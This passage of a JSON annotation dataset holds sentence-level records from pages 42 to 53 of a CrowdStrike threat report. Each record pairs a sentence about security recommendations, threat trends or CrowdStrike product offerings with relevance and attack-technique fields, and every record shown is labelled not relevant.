(IAM)\n• Use MFA for all user accounts •", "sentence_text": "Enforce strong password policies • Implement least-privilege access principles •", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p42-s392-d6c7d2", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 42, "sentence_id": 392, "context_before": "Enforce strong password policies • Implement least-privilege access principles •", "sentence_text": "Regularly review and audit user permissions Enhance data protection • Encrypt data at rest and in transit • Implement data loss prevention (DLP) solutions • Regularly back up critical data and test restoration processes Conduct regular security assessments • Audit SaaS providers to ensure compliance with relevant security frameworks Improve monitoring and incident response •", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p42-s393-c27738", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 42, "sentence_id": 393, "context_before": "Regularly review and audit user permissions Enhance data protection • Encrypt data at rest and in transit • Implement data loss prevention (DLP) solutions • Regularly back up critical data and test restoration processes Conduct regular security assessments • Audit SaaS providers to ensure compliance with relevant security frameworks Improve monitoring and incident response •", "sentence_text": "Implement user behavior-based monitoring • Develop and regularly test incident response plans Educate users •", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p42-s394-68ba2d", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 42, "sentence_id": 394, "context_before": "Implement user behavior-based monitoring • Develop and regularly test incident response plans Educate users •", "sentence_text": "Provide regular security awareness training • Teach employees to recognize phishing attempts and social engineering tactics Implement secure configuration management • Regularly review and update SaaS application settings • Disable unnecessary features and integrations Develop a robust vendor management program •", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p42-s395-c4fac0", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 42, "sentence_id": 395, "context_before": "Provide regular security awareness training • Teach employees to recognize phishing attempts and social engineering tactics Implement secure configuration management • Regularly review and update SaaS application settings • Disable unnecessary features and integrations Develop a robust vendor management program •", "sentence_text": "Assess a SaaS provider’s security posture before adopting the software •", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p42-s396-a62c30", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 42, "sentence_id": 396, "context_before": "Assess a SaaS provider’s security posture before adopting the software •", "sentence_text": "Regularly review provider security practices and certifications", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p43-s397-c6a369", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 43, "sentence_id": 397, "context_before": "Regularly review provider security practices and certifications", "sentence_text": "Social engineering proliferated throughout 2024 as adversaries explored new initial access methods to bypass security defenses.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p43-s398-d9f729", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 43, "sentence_id": 398, "context_before": "Social engineering proliferated throughout 2024 as adversaries explored new initial access methods to bypass security defenses.", "sentence_text": "Vishing was particularly popular, with eCrime adversaries more heavily relying on vishing, callback phishing, and help desk attacks to enter target networks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p43-s399-9b54ea", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 43, "sentence_id": 399, "context_before": "Vishing was particularly popular, with eCrime adversaries more heavily relying on vishing, callback phishing, and help desk attacks to enter target networks.", "sentence_text": "This trend is expected to continue and expand in 2025.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p43-s400-ae6650", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 43, "sentence_id": 400, "context_before": "This trend is expected to continue and expand in 2025.", "sentence_text": "GenAI became a key adversary tool in 2024, especially in support of social engineering campaigns and high-tempo IO campaigns.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p43-s401-8c9a41", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 43, "sentence_id": 401, "context_before": "GenAI became a key adversary tool in 2024, especially in support of social engineering campaigns and high-tempo IO campaigns.", "sentence_text": "Its low barrier to entry enables adversaries to create convincing content at scale without precise prompting or model training.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p43-s402-d723f0", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 43, "sentence_id": 402, "context_before": "Its low barrier to entry enables adversaries to create convincing content at scale without precise prompting or model training.", "sentence_text": "Though genAI is still relatively novel, CrowdStrike has identified several examples of its use and anticipates it will be employed in 2025 adversary operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p43-s403-ecc036", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 43, "sentence_id": 403, "context_before": "Though genAI is still relatively novel, CrowdStrike has identified several examples of its use and anticipates it will be employed in 2025 adversary operations.", "sentence_text": "Though they are less impactful to victims than BGH adversaries, targeted eCrime adversaries remain a persistent threat to specific sectors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p43-s404-30a71c", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 43, "sentence_id": 404, "context_before": "Though they are less impactful to victims than BGH adversaries, targeted eCrime adversaries remain a persistent threat to specific sectors.", "sentence_text": "Targeted eCrime adversaries demonstrated a growing interest in Latin American targets in 2024, realizing more lucrative profits through cryptocurrency theft in that region.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p43-s405-92acf2", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 43, "sentence_id": 405, "context_before": "Targeted eCrime adversaries demonstrated a growing interest in Latin American targets in 2024, realizing more lucrative profits through cryptocurrency theft in that region.", "sentence_text": "Targeted intrusion adversaries were also exceptionally active and innovative in 2024, adapting their tactics to achieve geopolitical and strategic objectives while evading improved defensive measures.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p43-s406-798e62", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 43, "sentence_id": 406, "context_before": "Targeted intrusion adversaries were also exceptionally active and innovative in 2024, adapting their tactics to achieve geopolitical and strategic objectives while evading improved defensive measures.", "sentence_text": "Russia-nexus adversaries are expected to continue their aggressive pursuit of victory in Ukraine, focusing primarily on intelligence collection operations targeting Ukraine and NATO members.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p43-s407-df35ff", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 43, "sentence_id": 407, "context_before": "Russia-nexus adversaries are expected to continue their aggressive pursuit of victory in Ukraine, focusing primarily on intelligence collection operations targeting Ukraine and NATO members.", "sentence_text": "These adversaries will likely focus on entities operating in key sectors aligning with the CCP's strategic priorities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p44-s408-4606c6", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 44, "sentence_id": 408, "context_before": "These adversaries will likely focus on entities operating in key sectors aligning with the CCP's strategic priorities.", "sentence_text": "The vulnerability exploitation landscape remains a critical concern.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p44-s409-6edf5d", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 44, "sentence_id": 409, "context_before": "The vulnerability exploitation landscape remains a critical concern.", "sentence_text": "Threat actors are expected to continue aggressively targeting devices at the network periphery, particularly network appliances.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p44-s410-0c7f3d", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 44, "sentence_id": 410, "context_before": "Threat actors are expected to continue aggressively targeting devices at the network periphery, particularly network appliances.", "sentence_text": "End-of-life (EOL) product exploitation is almost certain to continue or grow in 2025.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p44-s411-0dea3e", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 44, "sentence_id": 411, "context_before": "End-of-life (EOL) product exploitation is almost certain to continue or grow in 2025.", "sentence_text": "In their continued pursuit to discover new vulnerabilities or abuse legitimate product features, adversaries will likely leverage technical blogs and operationalize public POC exploits faster than in previous years.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p44-s412-e78b29", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 44, "sentence_id": 412, "context_before": "In their continued pursuit to discover new vulnerabilities or abuse legitimate product features, adversaries will likely leverage technical blogs and operationalize public POC exploits faster than in previous years.", "sentence_text": "SaaS applications are also an area of concern.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p44-s413-28f297", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 44, "sentence_id": 413, "context_before": "SaaS applications are also an area of concern.", "sentence_text": "After observing several eCrime and targeted intrusion adversaries use access to cloud-based SaaS applications to obtain data for lateral movement, extortion, and third-party targeting in 2024, Additionally, 2024 brought the emergence of threat actors who exclusively target cloud environments with unique, cloud-specific skill sets.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p44-s414-0c7656", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 44, "sentence_id": 414, "context_before": "After observing several eCrime and targeted intrusion adversaries use access to cloud-based SaaS applications to obtain data for lateral movement, extortion, and third-party targeting in 2024, Additionally, 2024 brought the emergence of threat actors who exclusively target cloud environments with unique, cloud-specific skill sets.", "sentence_text": "Adversaries strengthened their emphasis on defense evasion in cloud environments, adopting stealth-oriented tactics and tools for initial access and credential access.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p44-s415-6ba13e", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 44, "sentence_id": 415, "context_before": "Adversaries strengthened their emphasis on defense evasion in cloud environments, adopting stealth-oriented tactics and tools for initial access and credential access.", "sentence_text": "This focus is expected to intensify in 2025.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p44-s416-24721c", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 44, "sentence_id": 416, "context_before": "This focus is expected to intensify in 2025.", "sentence_text": "Throughout 2024, the enterprising adversary expanded the maturity and sophistication of their operations across sectors and geographies.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p45-s417-03994e", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 45, "sentence_id": 417, "context_before": "Throughout 2024, the enterprising adversary expanded the maturity and sophistication of their operations across sectors and geographies.", "sentence_text": "Organizations should adopt phishing-resistant MFA solutions, such as hardware security keys, to prevent unauthorized access.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p45-s418-42a416", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 45, "sentence_id": 418, "context_before": "Organizations should adopt phishing-resistant MFA solutions, such as hardware security keys, to prevent unauthorized access.", "sentence_text": "Identity threat detection tools must monitor behavior across endpoints and on-premises, cloud, and SaaS environments to flag privilege escalation, unauthorized access, or backdoor account creation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p45-s419-13daca", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 45, "sentence_id": 419, "context_before": "Identity threat detection tools must monitor behavior across endpoints and on-premises, cloud, and SaaS environments to flag privilege escalation, unauthorized access, or backdoor account creation.", "sentence_text": "Integrating these tools with XDR platforms ensures comprehensive visibility and a unified defense against adversaries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p45-s420-4d51ee", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 45, "sentence_id": 420, "context_before": "Integrating these tools with XDR platforms ensures comprehensive visibility and a unified defense against adversaries.", "sentence_text": "Additionally, organizations should educate users to recognize vishing and phishing attempts while maintaining proactive monitoring to detect and respond to identity-based threats.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p45-s421-f79ba9", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 45, "sentence_id": 421, "context_before": "Additionally, organizations should educate users to recognize vishing and phishing attempts while maintaining proactive monitoring to detect and respond to identity-based threats.", "sentence_text": "Eliminate cross-domain visibility gaps Adversaries’ growing use of hands-on-keyboard techniques and legitimate tools makes detection and response more difficult.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p45-s422-13c040", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 45, "sentence_id": 422, "context_before": "Eliminate cross-domain visibility gaps Adversaries’ growing use of hands-on-keyboard techniques and legitimate tools makes detection and response more difficult.", "sentence_text": "Unlike traditional malware, these methods allow attackers to bypass traditional security measures by executing commands and using legitimate software to mimic normal operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p45-s423-445413", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 45, "sentence_id": 423, "context_before": "Unlike traditional malware, these methods allow attackers to bypass traditional security measures by executing commands and using legitimate software to mimic normal operations.", "sentence_text": "To counter this, organizations must modernize their detection and response strategies.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p45-s424-2bef87", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 45, "sentence_id": 424, "context_before": "To counter this, organizations must modernize their detection and response strategies.", "sentence_text": "Defend the cloud as core infrastructure Cloud-focused adversaries are exploiting misconfigurations, stolen credentials, and cloud management tools to infiltrate systems, move laterally, and maintain persistent access for malicious activities like data theft and ransomware deployment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p45-s425-a66e90", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 45, "sentence_id": 425, "context_before": "Defend the cloud as core infrastructure Cloud-focused adversaries are exploiting misconfigurations, stolen credentials, and cloud management tools to infiltrate systems, move laterally, and maintain persistent access for malicious activities like data theft and ransomware deployment.", "sentence_text": "Cloud-native application protection platforms (CNAPPs) with cloud detection and response (CDR) capabilities are critical to counter these threats.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p46-s426-7e4b14", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 46, "sentence_id": 426, "context_before": "Cloud-native application protection platforms (CNAPPs) with cloud detection and response (CDR) capabilities are critical to counter these threats.", "sentence_text": "Regular audits are also critical to maintaining security.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p46-s427-6afa06", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 46, "sentence_id": 427, "context_before": "Regular audits are also critical to maintaining security.", "sentence_text": "Frequent reviews of cloud environments ensure unused permissions and outdated configurations are addressed promptly.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p46-s428-635c4b", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 46, "sentence_id": 428, "context_before": "Frequent reviews of cloud environments ensure unused permissions and outdated configurations are addressed promptly.", "sentence_text": "Prioritize vulnerabilities with an adversary-centric approach Adversaries are increasingly exploiting publicly disclosed vulnerabilities and using exploit chaining, combining multiple vulnerabilities to gain rapid access, escalate privileges, and bypass defenses.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p46-s429-e57051", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 46, "sentence_id": 429, "context_before": "Prioritize vulnerabilities with an adversary-centric approach Adversaries are increasingly exploiting publicly disclosed vulnerabilities and using exploit chaining, combining multiple vulnerabilities to gain rapid access, escalate privileges, and bypass defenses.", "sentence_text": "These multi-stage attacks often rely on public resources like POC exploits and technical blogs, enabling adversaries to craft effective and hard-to-detect payloads.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p46-s430-a5e268", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 46, "sentence_id": 430, "context_before": "These multi-stage attacks often rely on public resources like POC exploits and technical blogs, enabling adversaries to craft effective and hard-to-detect payloads.", "sentence_text": "Monitoring for subtle signs of exploit chaining, such as unexpected crashes or privilege escalation attempts, can help detect attacks before they progress.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p46-s431-958522", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 46, "sentence_id": 431, "context_before": "Monitoring for subtle signs of exploit chaining, such as unexpected crashes or privilege escalation attempts, can help detect attacks before they progress.", "sentence_text": "Know your adversary and be prepared When a cyberattack unfolds in minutes — or even seconds — being prepared can be the difference between containment and catastrophe.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p46-s432-f9691c", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 46, "sentence_id": 432, "context_before": "Know your adversary and be prepared When a cyberattack unfolds in minutes — or even seconds — being prepared can be the difference between containment and catastrophe.", "sentence_text": "Though technology is critical to detect and stop intrusions, the end user remains a crucial link in the chain to stop breaches.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p46-s433-3ded5b", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 46, "sentence_id": 433, "context_before": "Though technology is critical to detect and stop intrusions, the end user remains a crucial link in the chain to stop breaches.", "sentence_text": "Organizations should initiate user awareness programs to combat the continued threat of phishing and related social engineering techniques.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p46-s434-485725", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 46, "sentence_id": 434, "context_before": "Organizations should initiate user awareness programs to combat the continued threat of phishing and related social engineering techniques.", "sentence_text": "For security teams, practice makes perfect.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p46-s435-070a7d", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 46, "sentence_id": 435, "context_before": "For security teams, practice makes perfect.", "sentence_text": "Encourage an environment that routinely performs tabletop exercises and red/blue teaming to identify gaps and eliminate weaknesses in your cybersecurity practices and response.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p48-s436-67e668", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 48, "sentence_id": 436, "context_before": "Encourage an environment that routinely performs tabletop exercises and red/blue teaming to identify gaps and eliminate weaknesses in your cybersecurity practices and response.", "sentence_text": "| USB SECURITY Provides the visibility and precise control required to enable safe usage of USB devices across your organization FALCON FOR MOBILE | MOBILE THREAT DETECTION Protects against threats to iOS and Android devices, extending XDR/EDR to your mobile devices, with advanced threat protection and real-time visibility into app and network activity FALCON FORENSICS | FORENSIC CYBERSECURITY Allows you to quickly respond and recover with automated forensic data collection, enrichment, and correlation FALCON GO | SMB CYBER PROTECTION Gives small businesses peace of mind against cyber threats with easy-to-install next-gen antivirus, device control, and mobile device protection Counter Adversary Operations FALCON ADVERSARY OVERWATCH | INTELLIGENCE-LED THREAT HUNTING Provides 24/7 protection across endpoints, identities, and cloud workloads delivered by AI-powered threat hunting experts and includes built-in threat intelligence to expose adversary tradecraft, vulnerabilities, and stolen credentials", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p49-s437-c7615b", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 49, "sentence_id": 437, "context_before": "| USB SECURITY Provides the visibility and precise control required to enable safe usage of USB devices across your organization FALCON FOR MOBILE | MOBILE THREAT DETECTION Protects against threats to iOS and Android devices, extending XDR/EDR to your mobile devices, with advanced threat protection and real-time visibility into app and network activity FALCON FORENSICS | FORENSIC CYBERSECURITY Allows you to quickly respond and recover with automated forensic data collection, enrichment, and correlation FALCON GO | SMB CYBER PROTECTION Gives small businesses peace of mind against cyber threats with easy-to-install next-gen antivirus, device control, and mobile device protection Counter Adversary Operations FALCON ADVERSARY OVERWATCH | INTELLIGENCE-LED THREAT HUNTING Provides 24/7 protection across endpoints, identities, and cloud workloads delivered by AI-powered threat hunting experts and includes built-in threat intelligence to expose adversary tradecraft, vulnerabilities, and stolen credentials", "sentence_text": "| ADVERSARY INTELLIGENCE Delivers industry-leading intelligence reporting at your fingertips, along with prebuilt detections and one-click hunting, to cut the time and cost required to understand and defend against sophisticated nation-state, eCrime, and hacktivist adversaries FALCON COUNTER ADVERSARY OPERATIONS ELITE | ON-DEMAND ANALYST Provides an assigned analyst who leverages AI-powered investigative and threat hunting tools, enhanced by deep adversary intelligence, to detect and disrupt adversaries across your IT environment and beyond Cloud Security FALCON CLOUD SECURITY: PROACTIVE SECURITY Provides unified security posture management (USPM) and business context across cloud layers, leveraging industry-leading threat intelligence, end-to-end attack paths, and ExPRT.AI so cloud teams can swiftly prioritize their work, neutralize critical risks, and leave adversaries no room to strike FALCON CLOUD SECURITY:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p49-s438-2d90af", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 49, "sentence_id": 438, "context_before": "| ADVERSARY INTELLIGENCE Delivers industry-leading intelligence reporting at your fingertips, along with prebuilt detections and one-click hunting, to cut the time and cost required to understand and defend against sophisticated nation-state, eCrime, and hacktivist adversaries FALCON COUNTER ADVERSARY OPERATIONS ELITE | ON-DEMAND ANALYST Provides an assigned analyst who leverages AI-powered investigative and threat hunting tools, enhanced by deep adversary intelligence, to detect and disrupt adversaries across your IT environment and beyond Cloud Security FALCON CLOUD SECURITY: PROACTIVE SECURITY Provides unified security posture management (USPM) and business context across cloud layers, leveraging industry-leading threat intelligence, end-to-end attack paths, and ExPRT.AI so cloud teams can swiftly prioritize their work, neutralize critical risks, and leave adversaries no room to strike FALCON CLOUD SECURITY:", "sentence_text": "CLOUD RUNTIME PROTECTION Delivers leading cloud workload protection (CWP) and cloud detection and response (CDR), allowing SOC teams to detect and respond to active threats across hybrid clouds so adversaries are stopped in their tracks FALCON CLOUD SECURITY:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p49-s439-9e6342", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 49, "sentence_id": 439, "context_before": "CLOUD RUNTIME PROTECTION Delivers leading cloud workload protection (CWP) and cloud detection and response (CDR), allowing SOC teams to detect and respond to active threats across hybrid clouds so adversaries are stopped in their tracks FALCON CLOUD SECURITY:", "sentence_text": "CNAPP Includes the features and capabilities of both Proactive Security and Cloud Runtime Protection for Falcon Cloud Security FALCON ADVERSARY OVERWATCH:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p49-s440-ebe0c6", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 49, "sentence_id": 440, "context_before": "CNAPP Includes the features and capabilities of both Proactive Security and Cloud Runtime Protection for Falcon Cloud Security FALCON ADVERSARY OVERWATCH:", "sentence_text": "CLOUD | THREAT HUNTING Offers both proactive and protective security as a managed service through Falcon Adversary OverWatch cross-domain threat hunting and Falcon Complete", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p50-s441-6cbf87", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 50, "sentence_id": 441, "context_before": "CLOUD | THREAT HUNTING Offers both proactive and protective security as a managed service through Falcon Adversary OverWatch cross-domain threat hunting and Falcon Complete", "sentence_text": "Identity Protection\nFALCON IDENTITY THREAT DETECTION Provides unified visibility across hybrid identities and AI-driven threat detection to expose identity-based threats before they escalate FALCON IDENTITY THREAT PROTECTION", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p50-s442-240ca8", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 50, "sentence_id": 442, "context_before": "Identity Protection\nFALCON IDENTITY THREAT DETECTION Provides unified visibility across hybrid identities and AI-driven threat detection to expose identity-based threats before they escalate FALCON IDENTITY THREAT PROTECTION", "sentence_text": "Secures hybrid identities with AI-driven threat detection and behavioral analytics, leveraging the unified Falcon platform to stop identity-based attacks in real time FALCON ADVERSARY", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p51-s443-99d67c", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 51, "sentence_id": 443, "context_before": "Secures hybrid identities with AI-driven threat detection and behavioral analytics, leveraging the unified Falcon platform to stop identity-based attacks in real time FALCON ADVERSARY", "sentence_text": "INCIDENT RESPONSE\nProvides 24/7 elite incident response to contain threats, restore order, and mitigate breach impact Incident Response Services | Provides comprehensive response and recovery in the event of a cyber breach — spanning investigation, remediation, and recovery — backed by world-class threat intelligence and delivered by a highly experienced IR team Active Defense Services | Provides cross-domain response to recover from a breach with speed and precision Services Retainer | Provides on-demand access to CrowdStrike expertise, from rapid response to long-term resilience STRATEGIC ADVISORY SERVICES Develops and matures the security program to improve defenses Tabletop Exercises | Simulates incident response scenarios that expose process gaps and improve coordination across the full team, from hands-on-keyboard analysts to executive stakeholders Maturity Assessment | Comprehensively evaluates your organization’s security posture, identifying gaps, benchmarking capabilities, and providing a prioritized roadmap to strengthen defenses against evolving threats Regulation Readiness and CXO Advisory", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p51-s444-0b3947", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 51, "sentence_id": 444, "context_before": "INCIDENT RESPONSE\nProvides 24/7 elite incident response to contain threats, restore order, and mitigate breach impact Incident Response Services | Provides comprehensive response and recovery in the event of a cyber breach — spanning investigation, remediation, and recovery — backed by world-class threat intelligence and delivered by a highly experienced IR team Active Defense Services | Provides cross-domain response to recover from a breach with speed and precision Services Retainer | Provides on-demand access to CrowdStrike expertise, from rapid response to long-term resilience STRATEGIC ADVISORY SERVICES Develops and matures the security program to improve defenses Tabletop Exercises | Simulates incident response scenarios that expose process gaps and improve coordination across the full team, from hands-on-keyboard analysts to executive stakeholders Maturity Assessment | Comprehensively evaluates your organization’s security posture, identifying gaps, benchmarking capabilities, and providing a prioritized roadmap to strengthen defenses against evolving threats Regulation Readiness and CXO Advisory", "sentence_text": "| Exposes vulnerabilities in the genAI stack that could be exploited by testing LLM integrations for sensitive data exposure and adversarial manipulation", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p52-s445-870aab", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 52, "sentence_id": 445, "context_before": "| Exposes vulnerabilities in the genAI stack that could be exploited by testing LLM integrations for sensitive data exposure and adversarial manipulation", "sentence_text": "TECHNICAL ASSESSMENT SERVICES Audits and addresses security gaps across endpoints, cloud, and SaaS applications to tangibly reduce risk Technical Risk Assessment | Highlights security vulnerabilities, weaknesses, and gaps in the IT environment across endpoint devices, applications, and user identities Identity Security Assessment | Audits identity security practices and defense posture for weaknesses, including Active Directory domain configuration, account configuration, privilege delegation, and potential attack paths Cloud Security Assessment | Identifies misconfigurations and vulnerabilities in the cloud estate that could be exploited by adversaries Compromise Assessment | Exposes and addresses undetected threat activity through a one-time threat hunt available for endpoint, cloud, and SaaS applications TRAINING AND SECURITY UPSKILLING Builds security acumen and closes the skills gap through CrowdStrike University, offering on-demand training, personalized learning paths, and five certifications for deep Falcon module expertise", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p53-s446-3d50bb", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 53, "sentence_id": 446, "context_before": "TECHNICAL ASSESSMENT SERVICES Audits and addresses security gaps across endpoints, cloud, and SaaS 